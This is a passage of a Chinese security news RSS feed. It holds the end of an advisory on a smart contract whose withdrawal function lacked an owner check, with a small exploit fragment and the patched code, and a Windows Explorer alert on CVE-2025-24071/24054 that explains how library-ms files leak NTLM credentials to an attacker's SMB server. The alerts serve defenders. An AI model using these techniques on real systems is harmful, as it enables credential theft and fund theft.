!important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">withdrawBNB();</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"3"</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">```</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code></p></pre><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></strong></p></section></section></section></section><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">6、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">修复方案</strong></p></section></section></section></section></section><p></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">在withdrawStuckBNB函数中添加onlyOwner修饰，只允许owner可以调用这个函数</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section><p></p><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;color: rgb(51, 51, 51);font-size: 14px;letter-spacing: 0.544px;text-align: justify;box-sizing: border-box !important;overflow-wrap: break-word !important"><p style="text-indent: 0em;">```solidity<br/>function withdrawStuckBNB() <br/>external onlyOwner <br/>{    <br/>(bool success,) <br/>= marketingAddress.call{value: address(this).balance}("");    <br/>require(success,<br/>"Transfer failed");<br/>}```<br/></p></pre><p style="text-indent: 0em;"><span style="color: rgb(62, 62, 62); font-family: "PingFang SC", system-ui, -apple-system, BlinkMacSystemFont, "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; text-indent: 32px; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);"><br/></span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">  该漏洞目前<span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; font-family: "PingFang SC", system-ui, -apple-system, "system-ui", "Helvetica Neue", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; background-color: rgb(255, 255, 255); box-sizing: border-box !important; overflow-wrap: break-word !important;">已向相关单位和厂商报送并已推出补丁，<span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; box-sizing: border-box !important; overflow-wrap: break-word !important;">使用此漏洞造成的任何攻击影响均与本文作者无关。</span></span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="text-indent: 0em;"><a href="https://mp.weixin.qq.com/s/wDjly6wOmBucSo9DnmpgTw" target="_self">原文链接</a></p>]]></description> <pubDate>Tue, 01 Apr 2025 10:32:24 +0800</pubDate> <author>盛邦安全</author> </item> <item> <title><![CDATA[漏洞预警 | Windows 文件资源管理器欺骗漏洞（CVE-2025-24071、CVE-2025-24054）]]></title> <link><![CDATA[https://www.4hou.com/posts/MX2G]]></link> <description><![CDATA[<section><section><section><section><section><section><section><section><section></section><section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;">1、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">漏洞概述</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743474608698393.png" title="1743474608698393.png" alt="image.png"/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">近日，微软发布windows操作系统更新修复漏洞，其中Windows 文件资源管理器欺骗漏洞（CVE-2025-24071、CVE-2025-24054）正被广泛利用，建议您及时开展安全风险自查。</p></section></section></section></section></section></section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">据描述，由于windows的资源管理器默认信任libray-ms文件，支持读取此类文件进行渲染图标、缩略图和详细信息。当压缩包内存在此类文件时，用户解压包含smb（文件共享服务）路径配置的libray-ms文件，会自动被windows资源管理器内置文件解析机制解析，将受害者的NTLM身份信息发送到攻击者smb服务器。攻击者利用这种隐式信任和自动文件处理行为来泄露凭据，然后可以利用这些凭据进行哈希传递攻击或脱机 NTLM 哈希破解。攻击者可以利用该漏洞以管理员权限执行操作，包括但不限于创建新用户、修改现有用户的权限、安装恶意软件等。</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;">漏洞影响的产品和版本：</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2022</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2019 (Server Core installation)</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2019</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 1809 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 1809 for 32-bit Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2012 R2 (Server Core installation)</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2012 R2</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2016 (Server Core installation)</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2016</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 1607 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 1607 for 32-bit Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 for 32-bit Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2025</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 11 Version 24H2 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 11 Version 24H2 for ARM64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2022, 23H2 Edition (Server Core installation)</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 11 Version 23H2 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 11 Version 23H2 for ARM64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2025 (Server Core installation)</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 22H2 for 32-bit Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 22H2 for ARM64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 22H2 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 11 Version 22H2 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 11 Version 22H2 for ARM64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 21H2 for x64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 21H2 for ARM64-based Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows 10 Version 21H2 for 32-bit Systems</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Windows Server 2022 (Server Core installation)</span></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section><section><section><section><section><section><section><section><section><section></section><section></section><section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">2、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">漏洞复现</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: left;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743474609776842.png" title="1743391787145517.png" alt="QQ20250331-112938.png"/></strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><section><section><section><section><section></section><section></section></section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">3、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">资产测绘</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important; text-align: left;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743474610188041.png" title="1743391798179335.png" alt="QQ20250331-112957.png"/></strong></p></section></section></section></section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></strong></p><section><section><section><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">4、</strong><strong style="-webkit-tap-highlight-color: transparent; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">解决方案</strong></p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></strong></p></section></section></section></section></section></section></section></section><p></p><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">升级修复</strong></p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></strong></p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important">目前windows已发布修复安全补丁：</p></section><section><ul class="code-snippet__line-index code-snippet__js list-paddingleft-2" style="list-style-type: none;"><li><p><br/></p></li></ul><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071</a> <br/><br/></pre></section><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></p></section><section><section><section><section><section><section><section><section><section></section><section></section><section></section></section><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">5、</strong><strong style="-webkit-tap-highlight-color: transparent; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">参考链接</strong></p></section></section></section></section></section></section></section></section><section><ul class="code-snippet__line-index code-snippet__js list-paddingleft-2" style="list-style-type: none;"><li><p><br/></p></li></ul><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054</a> <br/><a href="https://www.ddpoc.com/DVB-2023-8999.html">https://www.ddpoc.com/DVB-2023-8999.html</a> <br/><br/></pre></section><p></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p></section></section></section></section></section></section></section></section><p></p><p><a href="https://mp.weixin.qq.com/s/YGzswOXWKI_0-88zKWWPkw" target="_self">原文链接</a></p>]]></description> <pubDate>Tue, 01 Apr 2025 10:30:58 +0800</pubDate> <author>盛邦安全</author> </item> </channel> </rss>